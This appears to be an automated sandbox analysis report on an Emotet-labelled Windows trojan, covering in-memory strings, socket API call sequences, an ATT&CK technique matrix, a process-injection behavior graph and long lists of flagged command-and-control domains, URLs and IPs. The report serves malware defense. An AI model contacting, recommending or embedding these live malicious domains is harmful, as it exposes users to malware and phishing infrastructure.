Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.1875591417.0000000003060000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.1875591417.0000000003060000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.1912799660.0000000000620000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.1912799660.0000000000620000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.1934748852.0000000002090000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.1934748852.0000000002090000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001C.00000002.2003048692.0000000002AA0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001C.00000002.2003048692.0000000002AA0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001C.00000002.1961721864.0000000002700000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001C.00000002.1961721864.0000000002700000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001F.00000002.1989491611.00000000028D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001F.00000002.1989491611.00000000028D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001F.00000002.2028413256.0000000002AD0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001F.00000002.2028413256.0000000002AD0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000024.00000002.2019868965.00000000027F0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000024.00000002.2019868965.00000000027F0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000024.00000002.2034641560.0000000002AB0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000024.00000002.2034641560.0000000002AB0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000027.00000002.2056889554.0000000000E80000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000027.00000002.2056889554.0000000000E80000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000027.00000002.2057701274.0000000000EE0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000027.00000002.2057701274.0000000000EE0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02659E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,2_2_02659E40
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02671250 htons,socket,setsockopt,closesocket,bind,listen,2_2_02671250
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02670480 setsockopt,htons,socket,setsockopt,bind,2_2_02670480
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_01351250 htons,socket,setsockopt,closesocket,bind,listen,5_2_01351250
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_01350480 setsockopt,htons,socket,setsockopt,bind,5_2_01350480
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_01339E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,5_2_01339E40
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_01411250 htons,socket,setsockopt,closesocket,bind,listen,6_2_01411250
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_01410480 setsockopt,htons,socket,setsockopt,bind,6_2_01410480
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_013F9E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,6_2_013F9E40
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_01541250 htons,socket,setsockopt,closesocket,bind,listen,8_2_01541250
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_01540480 setsockopt,htons,socket,setsockopt,bind,8_2_01540480
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_01529E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,8_2_01529E40

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Valid Accounts		22
Native API		1
DLL Side-Loading		1
Abuse Elevation Control Mechanism		1
Disable or Modify Tools		111
Input Capture		2
System Time Discovery		1
Remote Desktop Protocol		1
Archive Collected Data		4
Ingress Tool Transfer		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter		1
Create Account		1
DLL Side-Loading		1
Abuse Elevation Control Mechanism		LSASS Memory11
Account Discovery		Remote Desktop Protocol1
Screen Capture		11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Scheduled Task/Job		1
Valid Accounts		1
Valid Accounts		1
Obfuscated Files or Information		Security Account Manager1
System Network Connections Discovery		SMB/Windows Admin Shares111
Input Capture		11
Non-Standard Port		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron1
Scheduled Task/Job		11
Access Token Manipulation		31
Software Packing		NTDS2
File and Directory Discovery		Distributed Component Object Model2
Clipboard Data		1
Remote Access Software		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchd1
Registry Run Keys / Startup Folder		613
Process Injection		1
DLL Side-Loading		LSA Secrets143
System Information Discovery		SSHKeylogging3
Non-Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
Bootkit		1
Scheduled Task/Job		322
Masquerading		Cached Domain Credentials1
Query Registry		VNCGUI Input Capture14
Application Layer Protocol		Data Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
Registry Run Keys / Startup Folder		1
Valid Accounts		DCSync351
Security Software Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job151
Virtualization/Sandbox Evasion		Proc Filesystem151
Virtualization/Sandbox Evasion		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
Access Token Manipulation		/etc/passwd and /etc/shadow13
Process Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron613
Process Injection		Network Sniffing11
Application Window Discovery		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
Bootkit		Input Capture1
System Owner/User Discovery		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1553805 Sample: uavINoSIQh.exe Startdate: 11/11/2024 Architecture: WINDOWS Score: 100 49 vowyzuf.com 2->49 51 vowymom.com 2->51 53 1006 other IPs or domains 2->53 67 Suricata IDS alerts for network traffic 2->67 69 Malicious sample detected (through community Yara rule) 2->69 71 Antivirus detection for URL or domain 2->71 73 18 other signatures 2->73 9 uavINoSIQh.exe 2 3 2->9         started        signatures3 process4 file5 41 C:\Windows\apppatch\svchost.exe, PE32 9->41 dropped 43 C:\Windows\...\svchost.exe:Zone.Identifier, ASCII 9->43 dropped 75 Detected unpacking (changes PE section rights) 9->75 77 Detected unpacking (overwrites its own PE header) 9->77 79 Moves itself to temp directory 9->79 81 8 other signatures 9->81 13 svchost.exe 2 93 9->13         started        signatures6 process7 dnsIp8 55 lyvymej.com 13->55 57 vonyryk.com 13->57 59 28 other IPs or domains 13->59 83 System process connects to network (likely due to code injection or exploit) 13->83 85 Detected unpacking (changes PE section rights) 13->85 87 Detected unpacking (creates a PE file in dynamic memory) 13->87 89 17 other signatures 13->89 17 ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe 13->17 injected 21 ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe 13->21 injected 23 ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe 13->23 injected 25 10 other processes 13->25 signatures9 process10 dnsIp11 45 178.162.203.211, 62366, 62595, 62612 LEASEWEB-DE-FRA-10DE Germany 17->45 61 Monitors registry run keys for changes 17->61 63 Contains VNC / remote desktop functionality (version string found) 17->63 65 Found direct / indirect Syscall (likely to bypass EDR) 17->65 27 WerFault.exe 17->27         started        47 75.2.71.199, 443, 62606, 62624 AMAZON-02US United States 21->47 29 WerFault.exe 21->29         started        31 WerFault.exe 23->31         started        33 WerFault.exe 25->33         started        35 WerFault.exe 25->35         started        37 WerFault.exe 25->37         started        39 WerFault.exe 25->39         started        signatures12 process13

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
uavINoSIQh.exe84%ReversingLabsWin32.Trojan.Emotet
uavINoSIQh.exe100%AviraTR/Crypt.XPACK.Gen
uavINoSIQh.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://ww25.lyxynyx.com/login.php?subid1=20241112-0407-4879-ab0a-fce34aca034a100%Avira URL Cloudmalware
http://gaqykoz.com/login.php100%Avira URL Cloudmalware
http://vopycoc.com/login.php100%Avira URL Cloudmalware
http://qekyqoq.com/login.php100%Avira URL Cloudmalware
http://vojyzyt.com/login.php100%Avira URL Cloudmalware
http://pujylog.com/http://pujylog.com/H100%Avira URL Cloudmalware
http://qekysel.com/http://lykyser.com/http://vofyzof.com/http://qeqyqep.com/100%Avira URL Cloudmalware
http://pupymol.com/login.php100%Avira URL Cloudmalware
http://qeqykop.com/login.php100%Avira URL Cloudmalware
http://vowydef.com/login.php100%Avira URL Cloudmalware
http://lyrywoj.com/login.php100%Avira URL Cloudmalware
https://qegyhig.com/Pr100%Avira URL Cloudmalware
http://lyrynux.com/H100%Avira URL Cloudmalware
http://puzytul.com/login.php100%Avira URL Cloudmalware
http://puvypoq.com/H0%Avira URL Cloudsafe
http://lysyvax.com/login.php100%Avira URL Cloudmalware
http://lyvymej.com/login.php100%Avira URL Cloudmalware
http://gadykos.com/login.php100%Avira URL Cloudmalware
http://pumygyp.com/100%Avira URL Cloudmalware
http://puvycel.com/login.php100%Avira URL Cloudmalware
http://qedysyp.com/100%Avira URL Cloudphishing
http://vowypim.com/login.php100%Avira URL Cloudmalware
http://pufycol.com/login.phpcom/login.php100%Avira URL Cloudmalware
http://qedyhyl.com/login.php100%Avira URL Cloudmalware
http://lyryled.com/login.php100%Avira URL Cloudmalware
http://lymyner.com/login.php100%Avira URL Cloudmalware
http://puzymup.com/login.php100%Avira URL Cloudmalware
http://qekyhil.com/login.php100%Avira URL Cloudmalware
http://vojyduf.com/login.php100%Avira URL Cloudmalware
http://qedyhiq.com/H100%Avira URL Cloudmalware
http://gatyqeb.com/H100%Avira URL Cloudmalware
http://ganydeh.com/login.php100%Avira URL Cloudmalware
http://puzytap.com/login.php100%Avira URL Cloudmalware
http://qetynev.com/login.php0%Avira URL Cloudsafe
http://qegyval.com/login.php100%Avira URL Cloudmalware
http://qetyxiq.com/100%Avira URL Cloudmalware
http://vowykaf.com/login.php0%Avira URL Cloudsafe
http://lyxymin.com/100%Avira URL Cloudphishing
http://vopygat.com/login.php100%Avira URL Cloudphishing
http://lygyxux.com/login.php100%Avira URL Cloudmalware
http://gahycuz.com/P100%Avira URL Cloudmalware
http://galyhib.com/login.php100%Avira URL Cloudmalware
http://gacycaz.com/login.php100%Avira URL Cloudphishing
http://gadyhoh.com/login.php100%Avira URL Cloudmalware
http://pumyjip.com/login.php?100%Avira URL Cloudmalware
http://gahynuw.com/login.php100%Avira URL Cloudmalware
https://puzylyp.com/login.php100%Avira URL Cloudmalware
http://qeqyxyp.com/login.php100%Avira URL Cloudmalware
http://106.15.232.163:8000/dh/147287063_134827.html#index8?d=lyrysor.com0%Avira URL Cloudsafe
http://gadydow.com/login.php100%Avira URL Cloudmalware
http://lygyjuj.com/login.php100%Avira URL Cloudmalware
http://lyxynyx.com/login.phpn100%Avira URL Cloudmalware
http://pumyjip.com/login.php100%Avira URL Cloudmalware
http://qegyfyp.com/login.php100%Avira URL Cloudmalware
http://pumytup.com/login.php100%Avira URL Cloudmalware
http://purylup.com/100%Avira URL Cloudmalware
http://qedykiv.com/login.php100%Avira URL Cloudmalware
http://lyxyxox.com/login.php100%Avira URL Cloudmalware
http://gacyqoz.com/http://lygyfej.com/http://vocyqot.com/http://gacyqoz.com/H100%Avira URL Cloudphishing
http://vocypok.com/login.php100%Avira URL Cloudmalware
http://puvygyv.com/login.php100%Avira URL Cloudmalware
http://qekyqop.com/login.php100%Avira URL Cloudmalware
http://purywoq.com/login.php100%Avira URL Cloudmalware
http://volyjif.com/login.php100%Avira URL Cloudmalware
http://vofydak.com/login.php100%Avira URL Cloudmalware
http://pupywog.com/login.php100%Avira URL Cloudmalware
http://lyvytuj.com/http://vojyjof.com/http://vojyjof.com/100%Avira URL Cloudmalware
http://pujymiq.com/login.php100%Avira URL Cloudmalware
http://gacynuz.com/login.php100%Avira URL Cloudmalware
http://galyqaz.com/login.php100%Avira URL Cloudmalware
http://lyxysad.com/login.php100%Avira URL Cloudmalware
http://lyxylux.com/100%Avira URL Cloudmalware
http://gatyniz.com/H100%Avira URL Cloudmalware
http://lykyjad.com/login.php100%Avira URL Cloudmalware
http://gahyzez.com/login.php100%Avira URL Cloudmalware
http://volyzic.com/login.php100%Avira URL Cloudmalware
http://puryxuv.com/login.php100%Avira URL Cloudmalware
http://vopymyc.com/login.php100%Avira URL Cloudmalware
http://pufybyv.com/login.php100%Avira URL Cloudmalware
http://lykygur.com/100%Avira URL Cloudmalware
http://lygygux.com/http://pumypop.com/http://lyxywen.com/http://vojyjot.com/http://ganypis.com/http:100%Avira URL Cloudphishing
http://galyfis.com/100%Avira URL Cloudmalware
http://www.google.comtnl0%Avira URL Cloudsafe
http://vojycec.com/100%Avira URL Cloudmalware
http://pujygug.com/login.php100%Avira URL Cloudmalware
http://pujydap.com/login.php100%Avira URL Cloudmalware
http://lykymij.com/login.php100%Avira URL Cloudmalware
http://lysyvan.com/login.php100%Avira URL Cloudmalware
http://purywoq.com/100%Avira URL Cloudmalware
http://lykyfen.com/login.php100%Avira URL Cloudmalware
http://lykywid.com/login.php100%Avira URL Cloudmalware
http://pumydyg.com/login.php100%Avira URL Cloudmalware
http://qexylup.com/login.php100%Avira URL Cloudmalware
http://vopycyf.com/login.php100%Avira URL Cloudphishing
http://lysyxuj.com/login.php100%Avira URL Cloudmalware
http://pupylug.com/p100%Avira URL Cloudmalware
http://gacykas.com/login.php100%Avira URL Cloudmalware
http://vocymak.com/login.php100%Avira URL Cloudmalware
http://gatyveh.com/login.php100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
pupydeq.com
13.248.169.48
truetrue
    		unknown
    pupycag.com
    		18.208.156.248
    		truetrue
      		unknown
      lyvyxor.com
      		208.100.26.245
      		truetrue
        		unknown
        77026.bodis.com
        		199.59.243.227
        		truefalse
          		high
          lysyvan.com
          		188.114.96.3
          		truetrue
            		unknown
            galynuh.com
            		64.225.91.73
            		truetrue
              		unknown
              qegyhig.com
              		188.114.96.3
              		truetrue
                		unknown
                gatyfus.com
                		85.17.31.82
                		truetrue
                  		unknown
                  vonypom.com
                  		18.208.156.248
                  		truetrue
                    		unknown
                    puzylyp.com
                    		99.83.170.3
                    		truetrue
                      		unknown
                      qexyhuv.com
                      		76.223.67.189
                      		truetrue
                        		unknown
                        77980.bodis.com
                        		199.59.243.227
                        		truefalse
                          		high
                          pltraffic7.com
                          		72.52.179.174
                          		truefalse
                            		high
                            gadyciz.com
                            		44.221.84.105
                            		truetrue
                              		unknown
                              gadyniw.com
                              		154.212.231.82
                              		truetrue
                                		unknown
                                lyxynyx.com
                                		103.224.212.210
                                		truetrue
                                  		unknown
                                  www.sedoparking.com
                                  		64.190.63.136
                                  		truefalse
                                    		high
                                    lygyvuj.com
                                    		52.34.198.229
                                    		truetrue
                                      		unknown
                                      lygynud.com
                                      		3.94.10.34
                                      		truetrue
                                        		unknown
                                        s-part-0017.t-0009.t-msedge.net
                                        		13.107.246.45
                                        		truefalse
                                          		high
                                          gahyqah.com
                                          		23.253.46.64
                                          		truetrue
                                            		unknown
                                            vocyzit.com
                                            		44.221.84.105
                                            		truetrue
                                              		unknown
                                              galyqaz.com
                                              		199.191.50.83
                                              		truetrue
                                                		unknown
                                                vofycot.com
                                                		103.224.182.252
                                                		truetrue
                                                  		unknown
                                                  qetyhyg.com
                                                  		64.225.91.73
                                                  		truetrue
                                                    		unknown
                                                    gahyhiz.com
                                                    		44.221.84.105
                                                    		truetrue
                                                      		unknown
                                                      qetyfuv.com
                                                      		44.221.84.105
                                                      		truetrue
                                                        		unknown
                                                        gtm-sg-6l13ukk0m05.qu200.com
                                                        		103.150.10.48
                                                        		truetrue
                                                          		unknown
                                                          lymyxid.com
                                                          		3.94.10.34
                                                          		truetrue
                                                            		unknown
                                                            qegyval.com
                                                            		154.85.183.50
                                                            		truetrue
                                                              		unknown
                                                              gatyzoz.com
                                                              		unknown
                                                              		unknowntrue
                                                                		unknown
                                                                lykygaj.com
                                                                		unknown
                                                                		unknowntrue
                                                                  		unknown
                                                                  qedyxel.com
                                                                  		unknown
                                                                  		unknowntrue
                                                                    		unknown
                                                                    qedyqup.com
                                                                    		unknown
                                                                    		unknowntrue
                                                                      		unknown
                                                                      qekyluv.com
                                                                      		unknown
                                                                      		unknowntrue
                                                                        		unknown
                                                                        gatyrez.com
                                                                        		unknown
                                                                        		unknowntrue
                                                                          		unknown
                                                                          vofybic.com
                                                                          		unknown
                                                                          		unknowntrue
                                                                            		unknown
                                                                            pujydag.com
                                                                            		unknown
                                                                            		unknowntrue
                                                                              		unknown
                                                                              vojykom.com
                                                                              		unknown
                                                                              		unknowntrue
                                                                                		unknown
                                                                                qetysuq.com
                                                                                		unknown
                                                                                		unknowntrue
                                                                                  		unknown
                                                                                  vonyzut.com
                                                                                  		unknown
                                                                                  		unknowntrue
                                                                                    		unknown
                                                                                    pufyjuq.com
                                                                                    		unknown
                                                                                    		unknowntrue
                                                                                      		unknown
                                                                                      pujytug.com
                                                                                      		unknown
                                                                                      		unknowntrue
                                                                                        		unknown
                                                                                        galyhiw.com
                                                                                        		unknown
                                                                                        		unknowntrue
                                                                                          		unknown
                                                                                          lykygun.com
                                                                                          		unknown
                                                                                          		unknowntrue
                                                                                            		unknown
                                                                                            vopymyc.com
                                                                                            		unknown
                                                                                            		unknowntrue
                                                                                              		unknown
                                                                                              gatyfaz.com
                                                                                              		unknown
                                                                                              		unknowntrue
                                                                                                		unknown
                                                                                                vojycit.com
                                                                                                		unknown
                                                                                                		unknowntrue
                                                                                                  		unknown
                                                                                                  lyvymej.com
                                                                                                  		unknown
                                                                                                  		unknowntrue
                                                                                                    		unknown
                                                                                                    lygyvar.com
                                                                                                    		unknown
                                                                                                    		unknowntrue
                                                                                                      		unknown
                                                                                                      purygiv.com
                                                                                                      		unknown
                                                                                                      		unknowntrue
                                                                                                        		unknown
                                                                                                        gahykeb.com
                                                                                                        		unknown
                                                                                                        		unknowntrue
                                                                                                          		unknown
                                                                                                          purymog.com
                                                                                                          		unknown
                                                                                                          		unknowntrue
                                                                                                            		unknown
                                                                                                            gadyzib.com
                                                                                                            		unknown
                                                                                                            		unknowntrue
                                                                                                              		unknown
                                                                                                              ganyqow.com
                                                                                                              		unknown
                                                                                                              		unknowntrue
                                                                                                                		unknown
                                                                                                                lyxysun.com
                                                                                                                		unknown
                                                                                                                		unknowntrue
                                                                                                                  		unknown
                                                                                                                  puzyjyg.com
                                                                                                                  		unknown
                                                                                                                  		unknowntrue
                                                                                                                    		unknown
                                                                                                                    vopydek.com
                                                                                                                    		unknown
                                                                                                                    		unknowntrue
                                                                                                                      		unknown
                                                                                                                      qexyfuq.com
                                                                                                                      		unknown
                                                                                                                      		unknowntrue
                                                                                                                        		unknown
                                                                                                                        gatykyh.com
                                                                                                                        		unknown
                                                                                                                        		unknowntrue
                                                                                                                          		unknown
                                                                                                                          vocykem.com
                                                                                                                          		unknown
                                                                                                                          		unknowntrue
                                                                                                                            		unknown
                                                                                                                            gahynus.com
                                                                                                                            		unknown
                                                                                                                            		unknowntrue
                                                                                                                              		unknown
                                                                                                                              pumypop.com
                                                                                                                              		unknown
                                                                                                                              		unknowntrue
                                                                                                                                		unknown
                                                                                                                                lyvysur.com
                                                                                                                                		unknown
                                                                                                                                		unknowntrue
                                                                                                                                  		unknown
                                                                                                                                  galypob.com
                                                                                                                                  		unknown
                                                                                                                                  		unknowntrue
                                                                                                                                    		unknown
                                                                                                                                    puzypav.com
                                                                                                                                    		unknown
                                                                                                                                    		unknowntrue
                                                                                                                                      		unknown
                                                                                                                                      gacyqoz.com
                                                                                                                                      		unknown
                                                                                                                                      		unknowntrue
                                                                                                                                        		unknown
                                                                                                                                        lykywid.com
                                                                                                                                        		unknown
                                                                                                                                        		unknowntrue
                                                                                                                                          		unknown
                                                                                                                                          lykytin.com
                                                                                                                                          		unknown
                                                                                                                                          		unknowntrue
                                                                                                                                            		unknown
                                                                                                                                            vofyref.com
                                                                                                                                            		unknown
                                                                                                                                            		unknowntrue
                                                                                                                                              		unknown
                                                                                                                                              qekytig.com
                                                                                                                                              		unknown
                                                                                                                                              		unknowntrue
                                                                                                                                                		unknown
                                                                                                                                                vocyzek.com
                                                                                                                                                		unknown
                                                                                                                                                		unknowntrue
                                                                                                                                                  		unknown
                                                                                                                                                  puvypoq.com
                                                                                                                                                  		unknown
                                                                                                                                                  		unknowntrue
                                                                                                                                                    		unknown
                                                                                                                                                    puvybeg.com
                                                                                                                                                    		unknown
                                                                                                                                                    		unknowntrue
                                                                                                                                                      		unknown
                                                                                                                                                      pupydig.com
                                                                                                                                                      		unknown
                                                                                                                                                      		unknowntrue
                                                                                                                                                        		unknown
                                                                                                                                                        pupyguq.com
                                                                                                                                                        		unknown
                                                                                                                                                        		unknowntrue
                                                                                                                                                          		unknown
                                                                                                                                                          qedyqal.com
                                                                                                                                                          		unknown
                                                                                                                                                          		unknowntrue
                                                                                                                                                            		unknown
                                                                                                                                                            vowymom.com
                                                                                                                                                            		unknown
                                                                                                                                                            		unknowntrue
                                                                                                                                                              		unknown
                                                                                                                                                              purypol.com
                                                                                                                                                              		unknown
                                                                                                                                                              		unknowntrue
                                                                                                                                                                		unknown
                                                                                                                                                                ganypeb.com
                                                                                                                                                                		unknown
                                                                                                                                                                		unknowntrue
                                                                                                                                                                  		unknown
                                                                                                                                                                  vopymit.com
                                                                                                                                                                  		unknown
                                                                                                                                                                  		unknowntrue
                                                                                                                                                                    		unknown
                                                                                                                                                                    vowyguf.com
                                                                                                                                                                    		unknown
                                                                                                                                                                    		unknowntrue
                                                                                                                                                                      		unknown
                                                                                                                                                                      pupytiq.com
                                                                                                                                                                      		unknown
                                                                                                                                                                      		unknowntrue
                                                                                                                                                                        		unknown
                                                                                                                                                                        lymyfoj.com
                                                                                                                                                                        		unknown
                                                                                                                                                                        		unknowntrue
                                                                                                                                                                          		unknown
                                                                                                                                                                          vowyzuf.com
                                                                                                                                                                          		unknown
                                                                                                                                                                          		unknowntrue
                                                                                                                                                                            		unknown
                                                                                                                                                                            gatyruw.com
                                                                                                                                                                            		unknown
                                                                                                                                                                            		unknowntrue
                                                                                                                                                                              		unknown
                                                                                                                                                                              qebynyg.com
                                                                                                                                                                              		unknown
                                                                                                                                                                              		unknowntrue
                                                                                                                                                                                		unknown
                                                                                                                                                                                puzymev.com
                                                                                                                                                                                		unknown
                                                                                                                                                                                		unknowntrue
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  pupymol.com
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  		unknowntrue
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    vojycif.com
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    		unknowntrue
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      qebyvyl.com
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      		unknowntrue
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        lymysan.com
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        		unknowntrue
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          qekynuq.com
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          		unknowntrue
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            puryjil.com
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            		unknowntrue
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              puvytuv.com
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              		unknowntrue
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                galyzus.com
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                		unknowntrue
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  gadyfuh.com
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  		unknowntrue
